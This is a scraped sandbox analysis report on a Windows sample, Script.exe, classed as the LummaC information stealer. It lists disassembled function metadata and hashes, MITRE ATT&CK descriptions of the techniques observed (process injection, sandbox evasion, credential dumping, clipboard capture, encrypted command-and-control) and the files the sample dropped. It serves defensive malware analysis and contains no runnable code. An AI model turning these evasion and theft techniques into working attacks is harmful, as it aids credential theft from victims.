String ID:
API String ID:
Opcode ID: 5c8c3cdfaae57673cfd8b30e47bbdc9f81b332e5934e5216a320c01eb433e3d2
Instruction ID: 42437e8dbd3150991c74aa352b4ab357c7171b642901a8d446e7567a9cf83755
Opcode Fuzzy Hash: 5c8c3cdfaae57673cfd8b30e47bbdc9f81b332e5934e5216a320c01eb433e3d2
Instruction Fuzzy Hash: C011C6729525419BF3094E15C824356EB63EFE2315F2DC26DC0641BB8DCF7D94168BC9

Function 0043F710 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a24d113322b95a9d4371ddd1616b7a8c57defc5a3fa6a6e5a4da31bc5f87379
Instruction ID: b59c91cc492617ce91e1a8e79b2af03a6fd9152b3c87efacf825c9d223a79dd8
Opcode Fuzzy Hash: 2a24d113322b95a9d4371ddd1616b7a8c57defc5a3fa6a6e5a4da31bc5f87379
Instruction Fuzzy Hash: E5F0F9399042057BD1105B059C81C37776DE78E768F14133AF51413261E326ED198BA9

Function 0041B320 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b60d92f034b1d3e42354d3c585600494f47b129c7cfa50f561b72fa9a9e639e
Instruction ID: f861898cfebfc7e02cd56ae07d2973f82d544f899081ea2cec29424ffcdf8738
Opcode Fuzzy Hash: 6b60d92f034b1d3e42354d3c585600494f47b129c7cfa50f561b72fa9a9e639e
Instruction Fuzzy Hash: 82F028601046918FE7268F39849027BFBE1EF5B300F0CC1A9C0E29B296C639D482CB54

Function 0040B651 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72609d23d3f0ca88a1a6546ce7761e9877870bf706f1c736c72ef269828dc019
Instruction ID: 1213cb07f512f6ca4a2b73261b5f4ab7e72f1ffaa95908070f47a8de1c7ab1a2
Opcode Fuzzy Hash: 72609d23d3f0ca88a1a6546ce7761e9877870bf706f1c736c72ef269828dc019
Instruction Fuzzy Hash: 1DF0B4729065418BF3094F25C864326FB73AFD3314F19C2A9C0641BB89CFB9541A8BC8

Function 0040EB9A Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0456bf1ec266ed6600d3704076b4c01ba8b36363b32de00f05b1f8b2243114ca
Instruction ID: 2749a36e5ea0da6551ccd7632cf4089671b41b3cfe97addeaaae2c8788c5ad06
Opcode Fuzzy Hash: 0456bf1ec266ed6600d3704076b4c01ba8b36363b32de00f05b1f8b2243114ca
Instruction Fuzzy Hash: 9AF0E93442868087C2A8EB25C8619FDF3676FD130DF41347ED4C927195DF30250AC519

Function 00441E80 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aa58c32fd690b776d74c4e1317dc42f764286d9f7f2d00c556c5013b3098f9a
Instruction ID: 1f252219ac3aa9d09e7135296e9828b8ce804bf9d9ce4962798959a28c71823e
Opcode Fuzzy Hash: 6aa58c32fd690b776d74c4e1317dc42f764286d9f7f2d00c556c5013b3098f9a
Instruction Fuzzy Hash: 80E0E5749082408BE712AF28D06536BFBE0AB96310F909D5CD4D48B292D3BE94698B86

Function 0041FA00 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 6205f1014d972e8cb894ba5823684de59ee969592a18c3d49e71635eb1be44b6
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 74D0973078C3A00E8708CD3810A04B7FBE8ED43252B0814AFE0CAE3204C228EC06429C

Function 00430FD8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d290060911b0d95ad6821ba9d68c9a08d0b7328c0474b41de6a9e7ba4361bcee
Instruction ID: cc759b323ec707644e78336f28de732de20b2110dbe99438ad3b48b567cae593
Opcode Fuzzy Hash: d290060911b0d95ad6821ba9d68c9a08d0b7328c0474b41de6a9e7ba4361bcee
Instruction Fuzzy Hash: 0ED0A779E941114FDB0C8F34D86167577B0D306310F04A13D941AF3290DD2CF8064B09

Function 0040ADB0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d087fa91208b593d2c70268908f23f03f2b4ec53e294519b1fbd61e6f77adf78
Instruction ID: 7313cf0884d1d276f0e3abe2ac3a455dfc8328a1998be270ec1e925e58a2c175
Opcode Fuzzy Hash: d087fa91208b593d2c70268908f23f03f2b4ec53e294519b1fbd61e6f77adf78
Instruction Fuzzy Hash: 02C01279A084028FC600DF28C890CA5BBB6A38B200B06A468C848D3264D734E9028A08

Function 00432DC6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00432DD2

Strings

0, xrefs: 00433080
5aI, xrefs: 00433012

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: FreeString
String ID: 0$5aI
API String ID: 3341692771-3730819030
Opcode ID: c9134591110249cb01a91da658d416343c15b68bb941ffa9dcf3decc55a71e15
Instruction ID: 51e89f6a725eee1cefd312cbee5a4e613029949dcb42a71386a56e879905ee75
Opcode Fuzzy Hash: c9134591110249cb01a91da658d416343c15b68bb941ffa9dcf3decc55a71e15
Instruction Fuzzy Hash: 0581BF2410CFC1CEE362CA38844C797BFD11B67318F084A9DD1FE4B2D2CBAA61599726

Function 0043799D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004379D5
GetSystemMetrics.USER32 ref: 004379E4

Strings

, xrefs: 00437A92

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 2672e29f86d91c650e7767f63a1d311939a6131f49b5aad5070967761f743305
Instruction ID: 5f7817de0ccee01dbd0bc1cd5c78cdac72137f93f7b27c4b34968fd4351dc2ac
Opcode Fuzzy Hash: 2672e29f86d91c650e7767f63a1d311939a6131f49b5aad5070967761f743305
Instruction Fuzzy Hash: A631B1B49143048FDB00EF68D98565EBBF4BB8A304F11842EE898DB364D770A948CF92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Script.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Script.exe_c863c4e66bc5d0f1221d81680df4e591d56618e_6f1b0a17_3c1ccc1c-41cd-4272-b639-bdca7271f16b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER576.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DF.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Windows Analysis Report
Script.exe

Function 02977F5D Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 029780DA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 00F728C1 Relevance: 1.7, APIs: 1, Instructions: 219
memoryCOMMON

Function 00F706E0 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 0043BD30 Relevance: 34.2, APIs: 11, Strings: 8, Instructions: 923
memorycomCOMMON

Function 004110D7 Relevance: 20.1, APIs: 1, Strings: 10, Instructions: 839
COMMON

Function 03BD1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Function 00422350 Relevance: 11.7, Strings: 9, Instructions: 472
COMMON

Function 00408A60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 249
threadCOMMON

Function 0040CECB Relevance: 7.6, Strings: 6, Instructions: 149
COMMON

Function 00425F4E Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 434
COMMON

Function 0043180D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 331
COMMON

Function 004376F7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108
COMMON

Function 0043BAC0 Relevance: 5.2, Strings: 4, Instructions: 181
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre